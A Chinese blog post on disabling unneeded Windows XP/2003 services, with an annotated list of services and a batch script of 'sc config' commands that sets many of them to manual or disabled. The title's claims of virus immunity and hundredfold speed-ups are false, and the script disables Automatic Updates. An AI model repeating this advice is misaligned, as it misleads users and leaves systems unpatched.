分类：批处理

[推荐]花3分钟时间来关闭你电脑上没用的服务(加快你的电脑运行) 花3分钟时间来关闭你电脑上没用的服务，让你的电脑百毒不侵、提速百倍(^0^)!  可能有很多朋友还不知道如何启动服务选项：在控制面板→管理工具→服务；指着建议为“已停用”的服务属性改成“已禁用”并按停止即可；     Alerter  微软： 通知选取的使用者及计算机系统管理警示。如果停止这个服务，使用系统管理警示的程序将不会收到通知。如果停用这个服务，所有依存于它的服务将无法启动。  补充： 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts)，除非你的计算机用在局域网络上  依存： Workstation  建议： 已停用  Application Layer Gateway Service  微软： 提供因特网联机共享和因特网联机防火墙的第三方通讯协议插件的支持  补充： 如果你不使用因特网联机共享 (ICS) 提供多台计算机的因特网存取和因特网联机防火墙 (ICF) 软件你可以关掉  依存： Internt Connection Firewall (ICF) / Internet Connection Sharing (ICS)  建议： 已停用  Application Management (应用程序管理)  微软： 提供指派、发行、以及移除的软件安装服务。  补充： 如上说的软件安装变更的服务  建议： 手动  Automatic Updates  微软： 启用重要 Windows 更新的下载及安装。如果停用此服务，可以手动的从 Windows Update 网站上更新操作系统。  补充： 允许 Windows 于背景自动联机之下，到 Microsoft Servers 自动检查和下载更新修补程序  建议： 已停用  Background Intelligent Transfer Service  微软： 使用闲置的网络频宽来传输数据。  补充： 经由 Via HTTP1.1 在背景传输资料的?#124;西，例如 Windows Update 就是以此为工作之一  依存： Remote Procedure Call (RPC) 和 Workstation  建议： 已停用  ClipBook (剪贴簿)  微软： 启用剪贴簿检视器以储存信息并与远程计算机共享。如果这个服务被停止，剪贴簿检视器将无法与远程计算机共享信息。如果这个服务被停用，任何明确依存于它的服务将无法启动。  补充： 把剪贴簿内的信息和其它台计算机分享，一般家用计算机根本用不到  依存： Network DDE  建议： 已停用  COM+ Event System (COM+ 事件系统)  微软： 支持「系统事件通知服务 (SENS)」，它可让事件自动分散到订阅的 COM 组件。如果服务被停止，SENS 会关闭，并无法提供登入及注销通知。如果此服务被停用，任何明显依存它的服务都无法启动。  补充： 有些程序可能用到 COM+ 组件，像 BootVis 的 optimize system 应用，如事件检视器内显示的 DCOM 没有启用  依存： Remote Procedure Call (RPC) 和 System Event Notification  建议： 手动  COM+ System Application  微软： 管理 COM+ 组件的设定及追踪。如果停止此服务，大部分的 COM+ 组件将无法适当?#092;作。如果此服务被停用，任何明确依存它的服务将无法启动。  补充： 如果 COM+ Event System 是一台车，那么 COM+ System Application 就是司机，如事件检视器内显示的 DCOM 没有启用  依存： Remote Procedure Call (RPC)  建议： 手动  Computer Browser (计算机浏览器)  微软： 维护网络上更新的计算机清单，并将这个清单提供给做为浏览器的计算机。如果停止这个服务，这个清单将不会被更新或维护。如果停用这个服务，所有依存于它的服务将无法启动。  补充： 一般家庭用计算机不需要，除非你的计算机应用在区网之上，不过在大型的区网上有必要开这个拖慢速度吗？  依存： Server 和 Workstation  建议： 已停用  Cryptographic Services  微软： 提供三个管理服务: 确认 Windows 档案签章的 [类别目录数据库服务]; 从这个计算机新增及移除受信任根凭证授权凭证的 [受保护的根目录服务]; 以及协助注册这个计算机以取得凭证的  [金钥服务]。如果这个服务被停止，这些管理服务将无法正确工作。如果这个服务被停用，任何明确依存于它的服务将无法启动。  ...

rem WINDOWS 2003服务优化批处理 @pause @rem  Application Experience Lookup Service @rem  在应用程序启动时为应用程序处理应用程序兼容性查找请求。 sc config   AeLookupSvc start= AUTO @rem  Alerter @rem 微软： 通知选取的使用者及计算机系统管理警示。如果停止这个服务，使用系统管理@rem 警示的程序将不会收到通知。 @rem 补充： 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts)，除非你的计算机用在局域网络上 @rem 依存： Workstation @rem 建议： 已停用 sc config   Alerter start= DISABLED @rem  Application Layer Gateway Service @rem 微软： 提供因特网联机共享和因特网联机防火墙的第三方通讯协议插件的支持 @rem 补充： 如果你不使用因特网联机共享 (ICS) 提供多台计算机的因特网存取和因特网联机防火墙 (ICF) 软件你可以关掉 @rem 依存： Internt Connection Firewall (ICF) / Internet Connection Sharing (ICS) @rem 建议： 已停用 sc config   ALG start= DISABLED @rem Application Management (应用程序管理) @rem 微软： 提供指派、发行、以及移除的软件安装服务。 @rem 补充： 如上说的软件安装变更的服务 @rem 建议： 手动 sc config   AppMgmt start= DEMAND @rem Windows Audio @rem 微软： 管理用于 Windows 为主程序的音讯装置。如果这个服务被停止，音讯装置和效果将无法正常?#092;作。如果这个服务被停用，任@rem 何明确依存于它的服务将无法启动。 @rem 补充： 如果你没有声卡可以关了他 @rem 依存： Plug and Play、remote Procedure Call (RPC) @rem 建议： 自动 sc config   AudioSrv start= AUTO @rem Background Intelligent Transfer Service @rem 微软： 使用闲置的网络频宽来传输数据。 @rem 补充： 经由 Via HTTP1.1 在背景传输资料的?#124;西，例如 Windows Update 就是以此为工作之一 @rem 依存：remote Procedure Call (RPC) 和 Workstation @rem 建议： 已停用 sc config   BITS start= DISABLED @rem Computer Browser (计算机浏览器) @rem 微软： 维护网络上更新的计算机清单，并将这个清单提供给做为浏览器的计算机。如果停止这个服务，这个清单将不会被更新或维护。@rem 如果停用这个服务，所有依存于它的服务将无法启动。 @rem 补充： 一般家庭用计算机不需要，除非你的计算机应用在区网之上，不过在大型的区网上有必要开这个拖慢速度吗？ @rem 依存： Server 和 Workstation @rem 建议： 已停用 sc config   Browser start= DISABLED @rem Indexing Service (索引服务) @rem 微软： 本机和远程计算机的索引内容和档案属性; 透过弹性的查询语言提供快速档案存取。 @rem 补充： 简单的说可以让你加快搜查速度，不过我想应该很少人和远程计算机作搜寻吧 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   CiSvc start= DISABLED @rem  ClipBook (剪贴簿) @rem 微软： 启用剪贴簿检视器以储存信息并与远程计算机共享。如果这个服务被停止，剪贴簿检视器将无法与远程计算机共享信息。如果这@rem 个服务被停用，任何明确依存于它的服务将无法启动。 @rem 补充： 把剪贴簿内的信息和其它台计算机分享，一般家用计算机根本用不到 @rem 依存： Network DDE @rem 建议： 已停用 sc config   ClipSrv start= DISABLED @rem COM+ System Application @rem 微软： 管理 COM+ 组件的设定及追踪。如果停止此服务，大部分的 COM+ 组件将无法适当?#092;作。如果此服务被停用，任何明确依存@rem 它的服务将无法启动。 @rem 补充： 如果 COM+ Event System 是一台车，那么 COM+ System Application 就是司机，如事件检视器内显示的 DCOM 没有启用 @rem 依存：remote Procedure Call (RPC) @rem 建议： 手动 sc config   COMSysApp start= DEMAND @rem Cryptographic Services @rem 微软： 提供三个管理服务: 确认 Windows 档案签章的 [类别目录数据库服务]; 从这个计算机新增及移除受信任根凭证授权凭证的 [受@rem 保护的根目录服务]; 以及协助注册这个计算机以取得凭证的 [金钥服务]。如果这个服务被停止，这些管理服务将无法正确工作。 @rem 补充： 简单的说就是 Windows Hardware Quality Lab (WHQL)微软的一种认证，如果你有使用 Automatic Updates ，那你可能需要这个 @rem 依存：remote Procedure Call (RPC) @rem 建议： 手动 sc config   CryptSvc start= DEMAND @rem  DCOM Server Process Launcher @rem 为 DCOM 服务提供启动功能。 sc config   DcomLaunch start= AUTO @rem 将分散的文件共享合并成一个逻辑名称空间并在局域网或广域网上管理这些逻辑卷。如果这个服务被停止，用户则无法访问文件共享。 sc config   Dfs start= DEMAND @rem DHCP Client (DHCP 客户端) @rem 微软： 透过登录及更新 IP 地址和 DNS 名称来管理网络设定。 @rem 补充： 使用 DSL/Cable 、ICS 和 IPSEC 的人都需要这个来指定动态 IP @rem 依存： AFD 网络支持环境、NetBT、SYMTDI、TCP/IP Protocol Driver 和 NetBios over TCP/IP @rem 建议： 手动 sc config   Dhcp start= DEMAND @rem Logical Disk Manager Administrative Service (逻辑磁盘管理员系统管理服务) @rem 微软： 设定硬盘磁盘及磁盘区，服务只执行设定程序然后就停止。 @rem 补充： 使用 Microsoft Management Console(MMC)主控台的功能时才用到 @rem 依存： Plug and Play、remote Procedure Call (RPC)、Logical Disk Manager @rem 建议： 手动 sc config   dmadmin start= DEMAND @rem Logical Disk Manager (逻辑磁盘管理员) @rem 微软： 侦测及监视新硬盘磁盘，以及传送磁盘区信息到逻辑磁盘管理系统管理服务以供设定。如果这个服务被停止，动态磁盘状态和设@rem 定信息可能会过时。如果这个服务被停用，任何明确依存于它的服务将无法启动。 @rem 补充： 磁盘管理员用来动态管理磁盘，如显示磁盘可用空间等和使用 Microsoft Management Console(MMC)主控台的功能 @rem 依存： Plug and Play、remote Procedure Call (RPC)、Logical Disk Manager Administrative Service @rem 建议： 自动 sc config   dmserver start= AUTO @rem DNS Client (DNS 客户端) @rem 微软： 解析并快取这台计算机的网域名称系统 (DNS) 名称。如果停止这个服务，这台计算机将无法解析 DNS 名称并寻找 Active  @rem Directory 网域控制站的位置。如果停用这个服务，所有依存于它的服务将无法启动。 @rem 补充： 如上所说的，另外 IPSEC 需要用到 @rem 依存： TCP/IP Protocol Driver @rem 建议： 手动 sc config   Dnscache start= DEMAND @rem Error Reporting Service @rem 微软： 允许对执行于非标准环境中的服务和应用程序的错误报告。 @rem 补充： 微软的应用程序错误报告 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   ERSvc start= DISABLED @rem Event Log (事件记录文件) @rem 微软： 启用 Windows 为主的程序和组件所发出的事件讯息可以在事件检视器中检视。这个服务不能被停止。 @rem 补充： 允许事件讯息显示在事件检视器之上 @rem 依存： Windows Management Instrumentation @rem 建议： 自动 sc config   Eventlog start= AUTO @rem COM+ Event System (COM+ 事件系统) @rem 微软： 支持「系统事件通知服务 (SENS)」，它可让事件自动分散到订阅的 COM 组件。如果服务被停止，SENS 会关闭，并无法提供登入@rem 及注销通知。 @rem 补充： 有些程序可能用到 COM+ 组件，像 BootVis 的 optimize system 应用，如事件检视器内显示的 DCOM 没有启用 @rem 依存：remote Procedure Call (RPC) 和 System Event Notification @rem 建议： 手动 sc config   EventSystem start= DEMAND @rem Help and Support @rem 微软： 让说明及支持中心能够在这台计算机上执行。如果这个服务停止，将无法使用说明及支持中心。 @rem 补充： 如果不使用就关了吧 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   helpsvc start= DISABLED @rem Human Interface Device Access @rem 微软： 启用对人性化接口装置 (HID) 的通用输入存取，HID 装置启动并维护对这个键盘、远程控制、以及其它多媒体装置上事先定义的@rem 快捷纽的使用。如果这个服务被停止，这个服务控制的快捷纽将不再起作用。 @rem 补充： 如上所提到的 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   HidServ start= DISABLED @rem  http sll @rem 此服务通过安全套接字层(SSL)实现 HTTP 服务的安全超文本传送协议(HTTPS)。如果此服务被禁用，任何依赖它的服务将无法启动。 sc config   HTTPFilter start= DEMAND @rem IMAPI CD-Burning COM Service @rem 微软： 使用 Image Mastering Applications Programming Interface (IMAPI) 来管理光盘录制。如果这个服务被停止，这个计算机将@rem 无法录制光盘。如果这个服务被停用，任何明确地依赖它的服务将无法启动。 @rem 补充： XP 整合的 CD-R 和 CD-RW 光驱上拖放的烧录功能，可惜比不上烧录软件，关掉还可以加快 Nero 的开启速度 @rem 建议： 已停用 sc config   ImapiService start= DISABLED @rem Intersite Messaging @rem 启用在运行 Windows Server 的站点间交换消息。如果此服务被停用，消息将不交换，而且不计算其他服务的站点路由信息。如果此服务@rem 被禁用，任何依赖于它的服务将无法启用。 sc config   IsmServ start= DISABLED sc config   kdc start= DISABLED @rem Server (服务器) @rem 微软： 透过网络为这台计算机提供档案、打印、及命名管道的共享。如果停止这个服务，将无法使用这些功能。如果停用这个服务，所@rem 有依存于它的服务将无法启动。 @rem 补充： 简单的说就是档案和打印的分享，除非你有和其它计算机分享，不然就关了 @rem 依存： Computer Browser @rem 建议： 已停用 sc config   lanmanserver start= DISABLED @rem Workstation (工作站) @rem 微软： 建立并维护到远程服务器的客户端网络联机。如果停止这个服务，这些联机将无法使用。如果停用这个服务，所有依存于它的服@rem 务将无法启动。 @rem 补充： 因特网联机中所必要的一些功能 @rem 依存： Alerter、Background Intelligent Transfer Service、Computer Browser、Messenger、Net Logon、remote Procedure Call @rem (RPC) Locator @rem 建议： 自动 sc config   lanmanworkstation start= AUTO sc config   LicenseService start= DISABLED @rem TCP/IP NetBIOS Helper (TCP/IP NetBIOS 协助程序) @rem 微软： 启用 [NetBIOS over TCP/IP (NetBT)] 服务及 NetBIOS 名称解析的支持。 @rem 补充： 如果你的网络不使用 NetBios 或是 WINS ，你大可关闭 @rem 依存： AFD 网络支持环境、NetBt @rem 建议： 已停用 sc config   LmHosts start= DISABLED @rem Messenger (信差) @rem 微软： 在客户端及服务器之间传输网络传送及 [Alerter] 服务讯息。这个服务与 Windows Messenger 无关。如果停止这个服务，@rem @rem  Alerter 讯息将不会被传输。如果停用这个服务，所有依存于它的服务将无法启动。 @rem 补充： 允许网络之间互相传送提示讯息的功能，如 net send 功能，如不想被骚扰话可关了 @rem 依存： NetBIOS Interface、Plug and Play、remote Procedure Call (RPC)、Workstation @rem 建议： 已停用 sc config   Messenger start= DISABLED @rem NetMeetingremote Desktop Sharing (NetMeeting 远程桌面共享) @rem 微软： 让经过授权的使用者可以使用 NetMeeting 透过公司近端内部网络，由远程访问这部计算机。如果这项服务停止的话，远程桌面@rem 共享功能将无法使用。如果服务停用的话，任何依赖它的服务将无法启动。 @rem 补充： 如上说的，让使用者可以将计算机的控制权分享予网络上或因特网上的其它使用者，如果你重视安全性不想多开后门，就关了吧 @rem 建议： 已停用 sc config   mnmsrvc start= DISABLED @rem Distributed Transaction Coordinator (分布式交易协调器) @rem 微软： 协调跨越多个资源管理员的交易，比如数据库、讯息队列及档案系统。如果此服务被停止，这些交易将不会发生。如果服务被停@rem 用 ，任何明显依存它的服务将无法启动。 @rem 补充： 如上所说的，一般家庭用计算机用不太到，除非你启用的 Message Queuing @rem 依存：remote Procedure Call (RPC) 和 Security Accounts Manager @rem 建议： 已停用 sc config   MSDTC start= DISABLED @rem Windows Installer (Windows 安装程序) @rem 微软： 根据包含在 .MSI 档案内的指示来安装，修复以及移除软件。 @rem 补充： 是一个系统服务，协助使用者正确地安装、设定、追踪、升级和移除软件程序，可管理应用程序建立和安装的标准格式，并且追@rem 踪例如档案群组、登录项目及快捷方式等组件 @rem 依存：remote Procedure Call (RPC) @rem 建议： 手动 sc config   MSIServer start= DEMAND @rem Network DDE (网络 DDE) @rem 微软： 为动态数据交换 (DDE) 对在相同或不同计算机上执行的程序提供网络传输和安全性。如果这个服务被停止，DDE 传输和安全性将@rem 无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。 @rem 补充： 一般人好像用不到 @rem 依存： Network DDE DSDM、ClipBook @rem 建议： 已停用 sc config   NetDDE start= DISABLED @rem Network DDE DSDM (网络 DDE DSDM) @rem 微软： 讯息动态数据交换 (DDE) 网络共享。如果这个服务被停止，DDE 网络共享将无法使用。 @rem 补充： 一般人好像用不到 @rem 依存： Network DDE @rem 建议： 已停用 sc config   NetDDEdsdm start= DISABLED @rem Net Logon @rem 微软： 支持网域上计算机的账户登入事件的 pass-through 验证。 @rem 补充： 一般家用计算机不太可能去用到登入网域审查这个服务 @rem 依存： Workstation @rem 建议： 已停用 sc config   Netlogon start= DISABLED @rem Network Connections (网络联机) @rem 微软： 管理在网络和拨号联机数据夹中的对象，您可以在此数据夹中检视局域网络和远程联机。 @rem 补充： 控制你的网络联机 @rem 依存：remote Procedure Call (RPC)、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) @rem 建议： 手动 sc config   Netman start= DEMAND @rem Network Location Awareness (NLA) @rem 微软： 收集并存放网络设定和位置信息，并且在这个信息变更时通知应用程序。 @rem 补充： 如果不使用 ICF 和 ICS 可以关了它 @rem 依存： AFD网络支持环境、TCP/IP Procotol Driver、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) @rem 建议： 已停用 sc config   Nla start= DISABLED @rem  File Replication @rem  允许在多个服务器上自动同时复制和管理文件。如果此服务被终止，文件复制将不会进行并且服务器也不会同步。如果此服务被禁用，@rem 任何依赖它的服务将无法启动。 sc config   NtFrs start= DEMAND @rem NT LM Security Support Provider (NTLM 安全性支持提供者) @rem 微软： 为没有使用命名管道传输的远程过程调用 (RPC) 程序提供安全性。 @rem 补充： 如果不使用 Message Queuing 或是 Telnet Server 那就关了它 @rem 依存： Telnet @rem 建议： 已停用 sc config   NtLmSsp start= DISABLED @rem @rem ovable Storage (卸除式存放装置) @rem 微软： None @rem 补充： 除非你有 Zip 磁盘驱动器或是 USB 之类可携式的硬件或是 Tape 备份装置，不然可以尝试关了 @rem 依存：remote Procedure Call (RPC) @rem 建议： DISABLED sc config   NtmsSvc start= DEMAND @rem  Office Source Engine (office 2003) @rem  可保存用于更新和修复的安装文件，并且在下载安装程序更新和 Watson 错误报告时必须使用。 @rem  sc config   ose start= DEMAND @rem Plug and Play (随插随用) @rem 微软： 启用计算机以使用者没有或很少的输入来识别及适应硬件变更，停止或停用这个服务将导致系统不稳定。 @rem 补充： 顾名思义就是 PNP 环境 @rem 依存： Logical Disk Manager、Logical Disk Manager Administrative Service、Messenger、Smart Card、Telephony、Windows Audio @rem 建议： 自动 sc config   PlugPlay start= AUTO @rem IPSEC Services (IP 安全性服务) @rem 微软： 管理 IP 安全性原则并启动 ISAKMP/Oakley (IKE) 及 IP 安全性驱动程序。 @rem 补充： 协助保护经由网络传送的数据。IPSec 为一重要环节，为虚拟私人网络 (VPN) 中提供安全性，而 VPN 允许组织经由因特网安全@rem 地传输数据。在某些网域上也许需要，但是一般使用者大部分是不太需要的 @rem 依存： IPSEC driver、remote Procedure Call (RPC)、TCP/IP Protocol Driver @rem 建议： 手动 sc config   PolicyAgent start= DEMAND @rem Protected Storage (受保护的存放装置) @rem 微软： 提供受保护的存放区，来储存私密金钥这类敏感数据，防止未授权的服务、处理、或使用者进行存取。 @rem 补充： 用来储存你计算机上密码的服务，像 Outlook、拨号程序、其它应用程序、主从架构等等 @rem 依存：remote Procedure Call (RPC) @rem 建议： 自动 sc config   ProtectedStorage start= AUTO @rem remote Access Auto Connection Manager (远程访问自动联机管理员) @rem 微软： 当程序参照到远程 DNS 或 NetBIOS 名称或地址时，建立远程网络的联机。 @rem 补充： 有些 DSL/Cable 提供者，可能需要用此来处理登入程序 @rem 依存：remote Access Connection Manager、Telephony @rem 建议： 手动 sc config   RasAuto start= DEMAND @rem remote Access Connection Manager (远程访问联机管理员) @rem 微软： 建立网络联机。 @rem 补充： 网络联机用 @rem 依存： Telephony、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)、remote Access Auto @rem  Connection Manager @rem 建议： 手动 sc config   RasMan start= DEMAND @rem remote Desktop Help Session Manager @rem 微软： 管理并控制远程协助。如果此服务停止的话，远程协助将无法使用。停止此服务之前，请先参阅内容对话框中的 [依存性]标签。 @rem 补充： 如上说的管理和控制远程协助，如果不使用可以关了 @rem 依存：remote Procedure Call (RPC) @rem 建议： DISABLED sc config   RDSessMgr start= DISABLED @rem Routing andremote Access (路由和远程访问) @rem 微软： 提供连到局域网络及广域网络的公司的路由服务。 @rem 补充： 如上说的，提供拨号联机到区网或是 VPN 服务，一般用户用不到 @rem 依存：remote Procedure Call (RPC)、NetBIOSGroup @rem 建议： 已停用 sc config   remoteAccess start= DISABLED @rem remote Registry (远程登录服务) @rem 微软： 启用远程使用者修改这个计算机上的登录设定。如果这个服务被停止，登录只能由这个计算机上的使用者修改。如果这个服务被@rem 停用，任何明确依存于它的服务将无法启动。 @rem 补充： 基于安全性的理由，如果没有特别的需求，建议最好关了它，除非你需要远程协助修改你的登录设定 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   remoteRegistry start= DISABLED @rem remote Procedure Call (RPC) Locator (远程过程调用定位程序) @rem 微软： 管理 RPC 名称服务数据库。 @rem 补充： 如上说的，一般计算机上很少用到，可以尝试关了 @rem 依存： Workstation @rem 建议： DISABLED sc config   RpcLocator start= DISABLED @rem remote Procedure Call (RPC) (远程过程调用，RPC) @rem 微软： 提供结束点对应程序以及其它 RPC 服务。 @rem 补充： 一些装置都依存它，别去动它 @rem 依存： 太多了，自己去看看 @rem 建议： 自动 sc config   RpcSs start= AUTO @rem  Resultant Set of Policy Provider @rem  启用用户连接到远程计算机，访问该计算机的 Windows Management Instrumentation 数据库，并验证计算机的当前组策略设置或在应@rem 用设置之前检查它。如果此服务被停用，远程验证将不可用。如果此服务被禁用，任何依赖于它的服务将无法启用。 sc config   RSoPProv start= DEMAND @rem  Special Administration Console Helper @rem  允许管理员使用紧急管理服务远程访问命令行提示符。 sc config   sacsvr start= DISABLED @rem Security Accounts Manager (安全性账户管理员) @rem 微软： 储存本机账户的安全性信息。 @rem 补充： 管理账号和群组原则(gpedit.msc)应用 @rem 依存：remote Procedure Call (RPC)、Distributed Transaction Coordinator @rem 建议： 自动 sc config   SamSs start= AUTO @rem Smart Card (智慧卡) @rem 微软： 管理这个计算机所读取智能卡的存取。如果这个服务被停止，这个计算机将无法读取智能卡。如果这个服务被停用，任何明确依@rem 存于它的服务将无法启动。 @rem 补充： 如果你不使用 Smart Card ，那就可以关了 @rem 依存： Plug and Play @rem 建议： 已停用 sc config   SCardSvr start= DISABLED @rem Task Scheduler (工作排程器) @rem 微软： 让使用者能够在这个计算机上设定和排定自动的工作。如果停止这个服务，这些工作在它们排定的时间时将不会执行。 @rem 补充： 设定排定自动的工作，像一些定时磁盘扫瞄、病毒定时扫瞄、更新等等 @rem 依存：remote Procedure Call (RPC) @rem 建议： 自动 sc config   Schedule start= AUTO @rem Secondary Logon @rem 微软： 启用在其它认证下的起始程序。如果这个服务被停止，这类的登入存取将无法使用。 @rem 补充： 允许多个使用者处理程序，执行分身等 @rem 建议： 自动 sc config   seclogon start= AUTO @rem System Event Notification (系统事件通知) @rem 微软： 追踪诸如 Windows 登入、网络、和电源事件的系统事件。通知这些事件的 COM+ 事件系统订阅者。 @rem 补充： 如上所说的 @rem 依存： COM+ Event System @rem 建议： 自动 sc config   SENS start= AUTO @rem Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) @rem 微软： 为您的家用网络或小型办公室网络提供网络地址转译、寻址及名称解析服务和/或防止干扰的服务。 @rem 补充： 如果你不使用因特网联机共享(ICS)或是 XP 内含的因特网联机防火墙(ICF)你可以关掉 @rem 依存： Application Layer Gateway Service、Network Connections、Network Location Awareness(NLA)、remote Access Connection @rem  Manager @rem 建议： 已停用 sc config   SharedAccess start= DEMAND @rem Shell Hardware Detection @rem 微软： 为自动播放硬件事件提供通知。 @rem 补充： 一般使用在记忆卡或是CD装置、DVD装置上 @rem 依存：remote Procedure Call (RPC) @rem 建议： 自动 sc config   ShellHWDetection start= AUTO @rem Print Spooler (打印多任务缓冲处理器) @rem 微软： 将档案加载内存中以待稍后打印。 @rem 补充： 如果没有打印机，可以关了 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   Spooler start= DEMAND @rem Windows Image Acquisition (WIA) (Windows影像取得程序) @rem 微软： 为扫描仪和数字相机提供影像撷取服务。 @rem 补充： 如果扫描仪和数字相机内部具有支持WIA功能的话，那就可以直接看到图档，不需要其它的驱动程序，所以没有扫描仪和数字相机@rem 的使用者大可关了 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   stisvc start= DEMAND @rem MS Software Shadow Copy Provider @rem 微软： 管理磁盘区阴影复制服务所取得的以软件为主的磁盘区阴影复制。如果停止这个服务，就无法管理以软件为主的磁盘区阴影复制。 @rem 补充： 如上所说的，用来备份的东西，如 MS Backup 程序就需要这个服务 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   swprv start= DISABLED @rem Performance Logs and Alerts (效能记录文件及警示) @rem 微软： 基于事先设定的排程参数，从本机或远程计算机收集效能数据，然后将数据写入记录或?#124;发警讯。如果这个服务被停止，将@rem 不会收集效能信息。如果这个服务被停用，任何明确依存于它的服务将无法启动。 @rem 补充： 没什么价值的服务 @rem 建议： 已停用 sc config   SysmonLog start= DISABLED @rem Telephony (电话语音) @rem 微软： 为本机计算机上及经由局域网络连接到正在执行此服务的服务器上，控制电话语音装置和 IP 为主语音联机的程序，提供电话语@rem 音 API (TAPI) 支持。 @rem 补充： 一般的拨号调制解调器或是一些 DSL/Cable 可能用到 @rem 依存： Plug and Play、remote Procedure Call (RPC)、remote Access Connection Manager、remote Access Auto Connection @rem Manager @rem 建议： 手动 sc config   TapiSrv start= DEMAND @rem Terminal Services (终端机服务) @rem 微软： 允许多位使用者互动连接到同一部计算机、桌面的显示器及到远程计算机的应用程序。远程桌面的加强 (包含系统管理员的 RD)@rem 、快速切换使用者、远程协助和终端机服务器。 @rem 补充： 远程桌面或是远程协助的功能，不需要就关了 @rem 依存：remote Procedure Call (RPC)、Fast User Switching Compatibility、InteractiveLogon @rem 建议： 已停用 sc config   TermService start= DISABLED @rem Themes @rem 微软： 提供使用者经验主题管理。 @rem 补充： 很多人使用布景主题，不过如果没有使用的人，那就可以关闭 @rem 建议： 自动 sc config   Themes start= AUTO @rem  Distributed Link Tracking Server @rem  启用同域内的分布式链接跟踪客户端服务，以便在同域内提供更高的可靠性和有效维护。 sc config   TrkSvr start= DISABLED @rem Distributed Link Tracking Client (分布式连结追踪客户端) @rem 微软： 维护计算机中或网络网域不同计算机中 NTFS 档案间的连结。 @rem 补充： 维护区网内不同计算机之间的档案连结 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   TrkWks start= DISABLED sc config   Tssdis start= DISABLED sc config   UMWdf start= DEMAND @rem Uninterruptible Power Supply (不断电供电系统) @rem 微软： 管理连接到这台计算机的不断电电源供应 (UPS)。 @rem 补充： 不断电电源供应 (UPS)一般人有用到吗？除非你的电源供应器有具备此功能，不然就关了 @rem 建议： 已停用 sc config   UPS start= DISABLED sc config   vds start= DEMAND @rem Volume Shadow Copy @rem 微软： 管理及执行用于备份和其它目的的磁盘区卷影复制。如果这个服务被停止，卷影复制将无法用于备份，备份可能会失败。 @rem 补充： 如上所说的，用来备份的?#124;西，如 MS Backup 程序就需要这个服务 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   VSS start= DISABLED @rem Windows Time (Windows 时间设定) @rem 微软： 维护在网络上所有客户端及服务器的数据及时间同步处理。如果这个服务停止，将无法进行日期及时间同步处理。如果这个服务@rem 被停用，所有依存的服务都会停止。 @rem 补充： 网络对时校准用的，没必要就关了 @rem 建议： 已停用 sc config   W32Time start= DISABLED @rem WebClient @rem 微软： 启用 Windows 为主的程序来建立、存取，以及修改因特网为主的档案。如果停止这个服务，这些功能将无法使 @rem 补充： 使用 WebDAV 将档案或数据夹上载到所有的 Web 服务，基于安全性的理由，你可以尝试关闭 @rem 依存： WebDav Client Redirector @rem 建议： 已停用 sc config   WebClient start= DISABLED @rem  WinHTTP Web Proxy Auto-Discovery Service @rem  实现 Windows HTTP 服务(WinHTTP)的 Web 代理自动发现服务(WPAD)。WPAD 是用于启用 HTTP 客户端自动发现代理配置的协议。如果此@rem 服务被停用或禁用，WPAD 协议将在 HTTP 客户端的进程中执行，而不是在外部服务进程；因此不会造成功能损失。 sc config   WinHttpAutoProxySvc start= DEMAND @rem Windows Management Instrumentation (WMI) @rem 微软： 提供公用接口及对象模型，以存取有关操作系统、装置、应用程序及服务的管理信息。如果这个服务已停止，大多数的 Windows @rem 软件将无法正常工作。如果这个服务已停用，所有依存于它的服务都将无法启动。 @rem 补充： 如上说的，是一种提供一个标准的基础结构来监视和管理系统资源的服务，由不得你动他 @rem 依存： Event Log、remote Procedure Call (RPC) @rem 建议： 自动 sc config   winmgmt start= AUTO @rem Portable Media Serial Number @rem 微软： Retrieves the serial number of any portable music player connected to your computer @rem 补充： 透过联机计算机重新取得任何音乐拨放序号？没什么价值的服务 @rem 建议： 已停用 sc config   WmdmPmSN start= DISABLED @rem Windows Management Instrumentation Driver Extensions (Windows Management Instrumentation 驱动程序延伸) @rem 微软： 提供系统管理信息给予/取自驱动程序。 @rem 补充： Windows Management Instrumentation 的延伸，提供信息用的 @rem 建议： 手动 sc config   Wmi start= DEMAND @rem WMI Performance Adapter @rem 微软： 提供来自 WMIHiPerf 提供者的效能链接库信息。 @rem 补充： 如上所提 @rem 依存：remote Procedure Call (RPC) @rem 建议： 已停用 sc config   WmiApSrv start= DISABLED @rem Automatic Updates @rem 微软： 启用重要 Windows 更新的下载及安装。如果停用此服务，可以手动的从 Windows Update 网站上更新操作系统。 @rem 补充： 允许 Windows 于背景自动联机之下，到 Microsoft Servers 自动检查和下载更@rem 新修补程序 @rem 建议： 已停用 sc config   wuauserv start= DISABLED @rem Wireless Zero Configuration @rem 微软： 为 802.11 适配卡提供自动设定 @rem 补充： 自动配置无线网络装置，言下之意就是说，除非你有在使用无线网络适配卡装置，那么你才有必要使用这个网络零管理服务 @rem 依存： NDIS Usermode I/O Protocol、remote Procedure Call (RPC) @rem 建议： 已停用 sc config   WZCSVC start= DISABLED @rem  Network Provisioning Service @rem  在域内为自动网络提供管理 XML 配置文件。 sc config   xmlprov start= DEMAND @pause

